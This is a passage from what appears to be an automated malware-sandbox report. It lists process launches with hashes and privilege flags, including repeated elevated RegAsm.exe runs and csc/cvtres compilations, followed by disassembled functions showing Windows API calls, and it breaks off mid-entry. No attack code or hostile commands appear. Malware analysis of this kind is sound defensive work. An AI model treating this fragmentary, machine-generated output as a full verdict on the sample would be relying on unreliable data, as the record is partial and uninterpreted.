                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES83D5.tmp" "c:\Users\user\AppData\Local\Temp\pejlabp5\CSCDF701219C1C48818E6CA425D3E8BAB7.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:35
                                                          Start time:20:18:18
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0xb10000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:37
                                                          Start time:20:18:21
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:38
                                                          Start time:20:18:21
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9337.tmp" "c:\Users\user\AppData\Local\Temp\rcv5n2si\CSC2F361128F45F4F0A9752D6455878CB1F.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:39
                                                          Start time:20:18:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0x370000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:40
                                                          Start time:20:18:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0x370000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:41
                                                          Start time:20:18:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0x9b0000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:4.7%
                                                            Dynamic/Decrypted Code Coverage:95.7%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:70
                                                            Total number of Limit Nodes:4
                                                            execution_graph 7257 b57cb0 7258 b57cf4 7257->7258 7259 b57cfe EnumThreadWindows 7257->7259 7258->7259 7260 b57d30 7259->7260 7261 b569df 7264 b56238 7261->7264 7265 b56243 7264->7265 7268 b57bb0 7265->7268 7266 b569ec 7269 b57c0f GetCurrentThreadId 7268->7269 7271 b57c55 7269->7271 7271->7266 7272 b563c8 DuplicateHandle 7273 b5645e 7272->7273 7274 b58448 7275 b58463 MessageBoxW 7274->7275 7277 b584d4 7275->7277 7278 73d01c 7279 73d030 7278->7279 7280 73d070 7279->7280 7284 b50874 7279->7284 7289 b50848 7279->7289 7292 b50838 7279->7292 7285 b50832 7284->7285 7286 b50882 7284->7286 7296 b54dbd 7285->7296 7287 b50869 7287->7280 7291 b54dbd 6 API calls 7289->7291 7290 b50869 7290->7280 7291->7290 7293 b50848 7292->7293 7294 b54dbd 6 API calls 7293->7294 7295 b50869 7294->7295 7295->7280 7297 b54e33 7296->7297 7298 b54f47 GetActiveWindow 7297->7298 7299 b54f75 7297->7299 7300 b54fe7 7297->7300 7298->7299 7299->7300 7305 b55730 7299->7305 7309 b55758 7299->7309 7313 b55749 7299->7313 7317 b5571f 7299->7317 7300->7287 7306 b55739 7305->7306 7320 b54d28 7306->7320 7310 b55768 7309->7310 7311 b55785 7310->7311 7337 b54d38 7310->7337 7311->7300 7314 b55768 7313->7314 7315 b54d38 4 API calls 7314->7315 7316 b55785 7314->7316 7315->7316 7316->7300 7318 b55744 7317->7318 7319 b54d28 5 API calls 7317->7319 7318->7300 7319->7318 7321 b54d33 7320->7321 7322 b569a2 7321->7322 7324 b56228 7321->7324 7325 b56233 7324->7325 7326 b55758 4 API calls 7325->7326 7329 b56a81 7325->7329 7327 b56a9b 7326->7327 7330 b5630c 7327->7330 7329->7322 7331 b56317 7330->7331 7332 b56dbb 7331->7332 7334 b56328 7331->7334 7332->7329 7335 b56df0 OleInitialize 7334->7335 7336 b56e54 7335->7336 7336->7332 7338 b54d43 GetCurrentProcess 7337->7338 7340 b55e10 GetCurrentThread 7338->7340 7341 b55e09 7338->7341 7342 b55e46 7340->7342 7343 b55e4d GetCurrentProcess 7340->7343 7341->7340 7342->7343 7346 b55e83 7343->7346 7344 b55eab GetCurrentThreadId 7345 b55edc 7344->7345 7345->7311 7346->7344

                                                            Executed Functions

                                                            Function 00B55D69 Relevance: 6.1, APIs: 4, Instructions: 144threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 00B55DF6
                                                            • GetCurrentThread.KERNEL32 ref: 00B55E33
                                                            • GetCurrentProcess.KERNEL32 ref: 00B55E70
                                                            • GetCurrentThreadId.KERNEL32 ref: 00B55EC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 78cff74a1c2d1c244bb30c409a9ce523a44cbe32e837d7a6aac96ea341babbc7
                                                            • Instruction ID: 00fcb21f10eaae56f55a11c8f591a8f37412d7d0c3685764bac151b59a70c576
                                                            • Opcode Fuzzy Hash: 78cff74a1c2d1c244bb30c409a9ce523a44cbe32e837d7a6aac96ea341babbc7
                                                            • Instruction Fuzzy Hash: 685179B09007498FEB14DFA9D948B9EBFF1EF88312F24809AD409A72A1D7745944CF66
                                                            Function 00B54D38 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 00B55DF6
                                                            • GetCurrentThread.KERNEL32 ref: 00B55E33
                                                            • GetCurrentProcess.KERNEL32 ref: 00B55E70
                                                            • GetCurrentThreadId.KERNEL32 ref: 00B55EC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 7556b317ac301a450f35e2106711a1a8364c93d203553a392692bfa599e1ffbe
                                                            • Instruction ID: de567e34ffe5d0c280431017c0ddd1be1fa3b1f2ba407004998791e7af87b48a
                                                            • Opcode Fuzzy Hash: 7556b317ac301a450f35e2106711a1a8364c93d203553a392692bfa599e1ffbe
                                                            • Instruction Fuzzy Hash: FB5168B0900749CFEB14DFA9D948B9EBBF1FF88311F208499D409A7260D7746944CF66
                                                            Function 00B58218 Relevance: 4.7, APIs: 3, Instructions: 231windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 52 b58218-b58260 53 b58266-b5826b 52->53 54 b58319-b58322 52->54 53->54 57 b58271-b5829d GetActiveWindow 53->57 55 b58324-b58327 54->55 56 b58363-b58378 54->56 60 b5832a-b58333 55->60 61 b583d2-b583e2 56->61 62 b5837a-b58382 56->62 58 b582a6-b582c3 call b55758 call b57d7c 57->58 59 b5829f-b582a5 57->59 86 b582c5-b582d5 58->86 87 b582d7-b58303 GetFocus 58->87 59->58 63 b583e3-b583f5 60->63 64 b58339-b5834a call b563ac 60->64 66 b58384-b58395 call b563ac 62->66 67 b583a6-b583ae 62->67 82 b583f6-b583f8 63->82 79 b5834c-b58355 call b57d8c 64->79 80 b5835a-b58361 64->80 66->67 83 b58397-b583a1 call b57d98 66->83 67->61 68 b583b0-b583c1 call b563ac 67->68 68->61 84 b583c3-b583cd call b57da4 68->84 79->80 80->56 80->60 88 b58463-b5848b 82->88 89 b583fa-b583fd 82->89 83->67 84->61 86->54 94 b58305-b5830b 87->94 95 b5830c-b58316 87->95 92 b58493-b58497 88->92 93 b5848d-b58490 88->93 89->82 96 b583ff-b5840b 89->96 97 b5849f-b584d2 MessageBoxW 92->97 98 b58499-b5849c 92->98 93->92 94->95 95->54 100 b58433-b58437 96->100 101 b5840d-b58417 96->101 102 b584d4-b584da 97->102 103 b584db-b584ef 97->103 98->97 101->100 106 b58419-b58432 101->106 102->103
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: ActiveFocusWindow
                                                            • String ID:
                                                            • API String ID: 2022189218-0
                                                            • Opcode ID: 5a2e045c68275e8c4a9025a09028c4e592d7bc23f9e6e627bc756bd3930f0999
                                                            • Instruction ID: 9760a79099bbdacdf40827ffed6bc6f177b94b3ee7b3dc65a7553c2386432715
                                                            • Opcode Fuzzy Hash: 5a2e045c68275e8c4a9025a09028c4e592d7bc23f9e6e627bc756bd3930f0999
                                                            • Instruction Fuzzy Hash: 9C9138B4A042498FDB14CFA9C984BAEBBF5FF48711F1584D9E804EB251CB74E848CB65
                                                            Function 00B54DBD Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 110 b54dbd-b54e52 114 b55096-b550c9 110->114 115 b54e58-b54e7d 110->115 120 b550d0-b55105 114->120 115->120 121 b54e83-b54ea8 115->121 128 b5510c-b55141 120->128 121->128 129 b54eae-b54ebe 121->129 135 b55148-b55174 128->135 134 b54ec4-b54ec8 129->134 129->135 136 b54ed6-b54edb 134->136 137 b54eca-b54ed0 134->137 139 b5517b-b551b9 135->139 140 b54edd-b54ee3 136->140 141 b54ee9-b54eef 136->141 137->136 137->139 143 b551c0-b551fe 139->143 140->141 140->143 145 b54ef1-b54ef9 141->145 146 b54f00-b54f14 141->146 180 b55205-b5528e 143->180 145->146 157 b54f16-b54f18 146->157 158 b54f1a 146->158 161 b54f1f-b54f37 157->161 158->161 163 b54f41-b54f45 161->163 164 b54f39-b54f3f 161->164 167 b54f47-b54f73 GetActiveWindow 163->167 168 b54f88-b54f91 163->168 164->163 166 b54f94-b54fa1 164->166 176 b54fe1 166->176 177 b54fa3-b54fb9 call b549f8 166->177 171 b54f75-b54f7b 167->171 172 b54f7c-b54f86 167->172 168->166 171->172 172->166 209 b54fe1 call b55730 176->209 210 b54fe1 call b5571f 176->210 211 b54fe1 call b55749 176->211 212 b54fe1 call b55758 176->212 188 b54fd8-b54fde 177->188 189 b54fbb-b54fd2 177->189 206 b55290-b55299 180->206 207 b5529b 180->207 181 b54fe7-b5503b call b54a04 201 b55044 181->201 188->176 189->180 189->188 201->114 208 b5529d-b552a3 206->208 207->208 209->181 210->181 211->181 212->181
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: ActiveWindow
                                                            • String ID:
                                                            • API String ID: 2558294473-0
                                                            • Opcode ID: af7c67e97375f079537921b78a0c397c9d496e1e97a2fc426caf89b823498542
                                                            • Instruction ID: 3e63670184f6360f06323aae824ca9a8c485bf4359be2d47a4f564d2e88e4a40
                                                            • Opcode Fuzzy Hash: af7c67e97375f079537921b78a0c397c9d496e1e97a2fc426caf89b823498542
                                                            • Instruction Fuzzy Hash: DCC1A171F003199FDB189FB494547AE7BE2EF89301F148468E80AEB395DF389C468B65
                                                            Function 00B56387 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 213 b56387-b563b7 215 b563b9-b5645c DuplicateHandle 213->215 216 b56465-b56482 215->216 217 b5645e-b56464 215->217 217->216
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5644F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 0350e2acdc82aa4652f4d1836ec1c075142fbb1c7aa78f64146500b3b7dbc451
                                                            • Instruction ID: 03fa741b6f5ef247120e6ff683ccd24256948d3bada7df19e85759e157e60d61
                                                            • Opcode Fuzzy Hash: 0350e2acdc82aa4652f4d1836ec1c075142fbb1c7aa78f64146500b3b7dbc451
                                                            • Instruction Fuzzy Hash: FF3188B18053889FDB12CFA9D884ADEBFF4EF09310F14409AE844EB261D3789949CF61
                                                            Function 00B57BB0 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 220 b57bb0-b57c53 GetCurrentThreadId 224 b57c55-b57c5b 220->224 225 b57c5c-b57c9d call b56394 220->225 224->225
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00B57C42
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: CurrentThread
                                                            • String ID:
                                                            • API String ID: 2882836952-0
                                                            • Opcode ID: af00404995580b4025767ef763b4d0250790ac4fee4b4cf793f65869c5c386e5
                                                            • Instruction ID: 08e681fef3ed5ccf397c85798814ae69c69f57b34bcfa02a00d1f295d810330b
                                                            • Opcode Fuzzy Hash: af00404995580b4025767ef763b4d0250790ac4fee4b4cf793f65869c5c386e5
                                                            • Instruction Fuzzy Hash: BE3148B1A0024A8FCB10DF99D844B9EFFF1FB48314F1485AAD418AB352D374A944CFA6
                                                            Function 00B563C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 230 b563c8-b5645c DuplicateHandle 231 b56465-b56482 230->231 232 b5645e-b56464 230->232 232->231
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5644F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 6c02fa2d5a94f0060d44adc5ad154f4c40c7e5081d740868be7db91b0760474c
                                                            • Instruction ID: 273a24ff2d29f89ed6c75155586212a6ab1b551f8e7a38729397117e1ff6429b
                                                            • Opcode Fuzzy Hash: 6c02fa2d5a94f0060d44adc5ad154f4c40c7e5081d740868be7db91b0760474c
                                                            • Instruction Fuzzy Hash: D821D5B59003499FDB10CFAAD884ADEFBF9FB48320F14845AE918A3350D375A954CF65
                                                            Function 00B58440 Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 243 b58440-b5848b 245 b58493-b58497 243->245 246 b5848d-b58490 243->246 247 b5849f-b584d2 MessageBoxW 245->247 248 b58499-b5849c 245->248 246->245 249 b584d4-b584da 247->249 250 b584db-b584ef 247->250 248->247 249->250
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?), ref: 00B584C5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: abdf0bc6e78c252119c790b0e90de592e3ba500092d0861de184049b8dceb1d8
                                                            • Instruction ID: 5e430307ecb5d520582613d26d9ebc8291309502f5397db410852d678d608cc5
                                                            • Opcode Fuzzy Hash: abdf0bc6e78c252119c790b0e90de592e3ba500092d0861de184049b8dceb1d8
                                                            • Instruction Fuzzy Hash: 3E2112B6C0034A9FDB10CF9AD884ADEBBF5FB48310F10896ED819A7600C3756948CFA0
                                                            Function 00B57CB0 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 235 b57cb0-b57cf2 236 b57cf4 235->236 237 b57cfe-b57d2e EnumThreadWindows 235->237 240 b57cfc 236->240 238 b57d37-b57d64 237->238 239 b57d30-b57d36 237->239 239->238 240->237
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?), ref: 00B57D21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: a2ba59be8b2840743232105d98390cbf2a56d5b39d406a69697bd69f14e6c1d2
                                                            • Instruction ID: 8753eed4b26b0d33aaab26659c2434168968c98e5c1c7b6a0b49cb251b741310
                                                            • Opcode Fuzzy Hash: a2ba59be8b2840743232105d98390cbf2a56d5b39d406a69697bd69f14e6c1d2
                                                            • Instruction Fuzzy Hash: 312129719002498FDB14CF9AD844BEEFBF5EB88320F148469D814A3250D774A944CFA4
                                                            Function 00B57CA9 Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 252 b57ca9-b57cf2 253 b57cf4 252->253 254 b57cfe-b57d2e EnumThreadWindows 252->254 257 b57cfc 253->257 255 b57d37-b57d64 254->255 256 b57d30-b57d36 254->256 256->255 257->254
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?), ref: 00B57D21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: a1af82333c559fb6d7e86a26e43a3ecc8fdbe6c85f4fe35f36645f958cfe7199
                                                            • Instruction ID: d0b0e1c8337e902c22f0653ecb312ba0a694ffa4d684f2fa3abc08dadb02334a
                                                            • Opcode Fuzzy Hash: a1af82333c559fb6d7e86a26e43a3ecc8fdbe6c85f4fe35f36645f958cfe7199
                                                            • Instruction Fuzzy Hash: 3721E8B1A002498FDB14CF9AD944BAEFBF5FF48320F14846AD854A7250D7749945CF64
                                                            Function 00B58448 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 260 b58448-b5848b 262 b58493-b58497 260->262 263 b5848d-b58490 260->263 264 b5849f-b584d2 MessageBoxW 262->264 265 b58499-b5849c 262->265 263->262 266 b584d4-b584da 264->266 267 b584db-b584ef 264->267 265->264 266->267
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?), ref: 00B584C5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: 64868ce7b3cf3474b0a65dceb7e5c27324cab2e8e64dda1ba3b40c8bf8c93a3d
                                                            • Instruction ID: b861f4f6b7e0455f9f82c45743cbfb4fc6eb50e7abbb1a1c4f109afd6d3aa9aa
                                                            • Opcode Fuzzy Hash: 64868ce7b3cf3474b0a65dceb7e5c27324cab2e8e64dda1ba3b40c8bf8c93a3d
                                                            • Instruction Fuzzy Hash: BA21F0B690034A9FDB10CF9AD884ADEBBF5FB48310F10846AD918A7200C775A948CFA0
                                                            Function 00B56328 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 269 b56328-b56e52 OleInitialize 271 b56e54-b56e5a 269->271 272 b56e5b-b56e78 269->272 271->272
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 00B56E45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: baadb4b3a3cb01fb22d40568b9de865d3dd6ad4d3dbce58a43aa9360bbcc66c8
                                                            • Instruction ID: b2d4a4ed78cea5984de660372955a24097a29bdc8a301f9d20a028cf837499e4
                                                            • Opcode Fuzzy Hash: baadb4b3a3cb01fb22d40568b9de865d3dd6ad4d3dbce58a43aa9360bbcc66c8
                                                            • Instruction Fuzzy Hash: B11115B59003498FCB20DF9AC445B9EFBF4EB48324F208469D518A7250C775A944CFA5
                                                            Function 00B56DE8 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 275 b56de8-b56e52 OleInitialize 276 b56e54-b56e5a 275->276 277 b56e5b-b56e78 275->277 276->277
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 00B56E45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 89c791c8a35eb1d92d05accc933c25e98aabac1dbddab2d037e878b62541320f
                                                            • Instruction ID: b7ea3f963f5495acdfd6f283c4cdb9e71ea07b27cab34b59e21328abe648b028
                                                            • Opcode Fuzzy Hash: 89c791c8a35eb1d92d05accc933c25e98aabac1dbddab2d037e878b62541320f
                                                            • Instruction Fuzzy Hash: D91157B58003498FDB20DFAAC5457CEFBF4EF48324F208459D958A7250C379A944CFA1
                                                            Function 0073D01C Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1677291882.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_73d000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc9f871e7989b28fddbf9f3fb0fbdb91f6449880b7c9721d0e341756aa90dab8
                                                            • Instruction ID: 740a3bf9b185c79def3a0b07955b59beb36de5aaf05e20caa820a6f3b8cff1af
                                                            • Opcode Fuzzy Hash: fc9f871e7989b28fddbf9f3fb0fbdb91f6449880b7c9721d0e341756aa90dab8
                                                            • Instruction Fuzzy Hash: BB11B9B16443449FFB28EF24E984B26BB65F784B14F208A6DD5494B242C37EDC47C662
                                                            Function 0073D018 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1677291882.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_73d000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69cb109f1ebf70991b3efe2666d10f64516dda1397b1d354b9c9d73876fab4c4
                                                            • Instruction ID: b52a0bfa1311fb2d7a0678812ef1b5a9d280b276f9ef6d678158749ecd1e2ad7
                                                            • Opcode Fuzzy Hash: 69cb109f1ebf70991b3efe2666d10f64516dda1397b1d354b9c9d73876fab4c4
                                                            • Instruction Fuzzy Hash: 940126B1504784CFEB25EF14E5C4715BFA1FB40714F208AA9D8894B243C33ED846CB62

                                                            Non-executed Functions

                                                            Function 00B56E90 Relevance: .3, Instructions: 318COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e6e909fd9322f20f9f102881824f244f2d851d04de253eada1a34eb097079e53
                                                            • Instruction ID: 7e63af282290171708881d752c490171e4b60c5690bd83284564adcc7c7a68f0
                                                            • Opcode Fuzzy Hash: e6e909fd9322f20f9f102881824f244f2d851d04de253eada1a34eb097079e53
                                                            • Instruction Fuzzy Hash: F41276F9901F468BE310CF65EE8C38D3BB1BB86728B904219D6611B2F6D7B9154ACF44
                                                            Function 00B56E80 Relevance: .2, Instructions: 228COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e5025b078967fd85162d849e6098edee8e8ef69a15d09e8a1ef35b4e29b96f51
                                                            • Instruction ID: 8e809138330a853fa05c1bcc4f770dd2f061f360ca5fae9c0584ec4db0d4fb5f
